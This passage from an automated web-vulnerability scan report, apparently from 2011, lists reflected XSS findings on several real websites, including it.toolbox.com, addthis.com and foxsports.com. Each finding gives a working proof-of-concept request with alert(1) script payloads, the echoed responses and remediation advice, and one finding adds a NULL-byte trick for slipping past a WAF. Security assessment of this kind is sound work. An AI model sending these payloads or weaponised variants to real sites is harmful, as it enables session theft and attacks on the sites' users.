The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5fd5"><script>alert(1)</script>73be2182441 was submitted in the REST URL parameter 1. This input was echoed as b5fd5"><script>alert(1)</script>73be2182441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00b5fd5"><script>alert(1)</script>73be2182441/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:32:59 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 269cf<a>57679d84bdc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/again269cf<a>57679d84bdc/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Tue, 01 Feb 2011 15:33:37 GMT
Last-Modified: Tue, 01 Feb 2011 15:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
1.126. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dean.edwards.name
Path: /weblog/2006/06/again/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b483d"><script>alert(1)</script>e257170cefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b483d\"><script>alert(1)</script>e257170cefc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?b483d"><script>alert(1)</script>e257170cefc=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 592e2<script>alert(1)</script>9fd54abbf1d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr592e2<script>alert(1)</script>9fd54abbf1d HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 311
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Feb 2011 15:32:28 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 02 May 2011 15:32:28 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 03 Mar 2011 15:32:28 GMT; Path=/
Set-Cookie: di=%7B%7D..1296574348.19F|1296574348.19A; Domain=.addthis.com; Expires=Thu, 31-Jan-2013 04:49:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 01 Feb 2011 15:32:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 01 Feb 2011 15:32:28 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1cee6<script>alert(1)</script>ded05b5064d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.ehow.com/p.json?callback=_ate.ad.hpr1cee6<script>alert(1)</script>ded05b5064d&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ehow.com%2Fcomputer-software%2F&ref=http%3A%2F%2Fburp%2Fshow%2F4&o1jt6o HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296507257.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 290
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 02 Feb 2011 15:32:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 04 Mar 2011 15:32:00 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296660720.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 11:36:19 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 15:32:00 GMT
Connection: close
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c49f0<script>alert(1)</script>f5a6d19584e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /data/service-calendar.json?widget_query=true&zipcode=All&year=2009&month=10&day=12&max=4&widget_category_id=0&widget_category=All&jsoncallback=jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e&_=1255386319932 HTTP/1.1
Host: gocitykids.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Language: en
Content-Type: text/json;charset=UTF-8
Content-Length: 20190
Date: Wed, 02 Feb 2011 19:21:09 GMT
Connection: close
jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e( [{"id":"211700","name":"Groundhog Day (PG)","attractionAlias":"the-colonial-theatre-227-bridge-street-phoenixville-pa-19460-3449-us","phone":"610.917.0223; 610.917.1228","url":"http://www.thecoloni ...[SNIP]...
1.130. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/database-soup
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9deb'-alert(1)-'530e4bffa2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/database-soup?e9deb'-alert(1)-'530e4bffa2c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database So ...[SNIP]... aBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%26e9deb'-alert(1)-'530e4bffa2c%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.131. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/database-talk
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9726'-alert(1)-'362cf24ba31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/database-talk?e9726'-alert(1)-'362cf24ba31=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Ta ...[SNIP]... aBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26e9726'-alert(1)-'362cf24ba31%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.132. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/db2luw
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29327'-alert(1)-'14b42306d5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/db2luw?29327'-alert(1)-'14b42306d5d=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> An Expert's ...[SNIP]... r != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%2629327'-alert(1)-'14b42306d5d%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.133. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/db2zos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2553e'-alert(1)-'a0a7b564b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/db2zos?2553e'-alert(1)-'a0a7b564b7=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78368
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Getting the ...[SNIP]... r != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%262553e'-alert(1)-'a0a7b564b7%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.134. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/elsua
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3acb'-alert(1)-'93981464ca0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/elsua?f3acb'-alert(1)-'93981464ca0=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64515
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> elsua: The ...[SNIP]... er != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26f3acb'-alert(1)-'93981464ca0%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.135. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/juice-analytics
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79855'-alert(1)-'e9a3a93587c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/juice-analytics?79855'-alert(1)-'e9a3a93587c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61934
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Juice Analy ...[SNIP]... tnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%2679855'-alert(1)-'e9a3a93587c%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.136. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/minimalit
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3719a'-alert(1)-'3be2065b10e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/minimalit?3719a'-alert(1)-'3be2065b10e=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60105
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Minimal IT: ...[SNIP]... = ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%263719a'-alert(1)-'3be2065b10e%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.137. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/penguinista-databasiensis
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f871'-alert(1)-'61cc9848b43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/penguinista-databasiensis?2f871'-alert(1)-'61cc9848b43=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Penguinista ...[SNIP]...
1.138. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f740'-alert(1)-'6ebdefa1aa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday?1f740'-alert(1)-'6ebdefa1aa5=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63708
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%261f740'-alert(1)-'6ebdefa1aa5%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload d10fd<script>alert(1)</script>5443b795f8c was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98161"%3balert(1)//e83152febaa was submitted in the l parameter. This input was echoed as 98161";alert(1)//e83152febaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html98161"%3balert(1)//e83152febaa&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=0&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265
Response
HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 11135
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7bc"-alert(1)-"ecbff65bd55 was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=09d7bc"-alert(1)-"ecbff65bd55&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265
Response
HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 10579
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 73495<script>alert(1)</script>00d7074f8fe was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/millenniumhotels/mbox/standard?mboxHost=www.millenniumhotels.com&mboxSession=1296573995979-796819&mboxPage=1296573995979-796819&screenHeight=1200&screenWidth=1920&browserWidth=1036&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=2&hotelId=11536&mbox=Homepage_LeftNavStyle73495<script>alert(1)</script>00d7074f8fe&mboxId=0&mboxTime=1296552397746&mboxURL=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston&mboxVersion=39 HTTP/1.1
Host: millenniumhotels.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 217
Date: Wed, 02 Feb 2011 15:36:11 GMT
Server: Test & Target
1.143. http://msn.foxsports.com/cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b51f6'-alert(1)-'4ced383f894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111?b51f6'-alert(1)-'4ced383f894=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
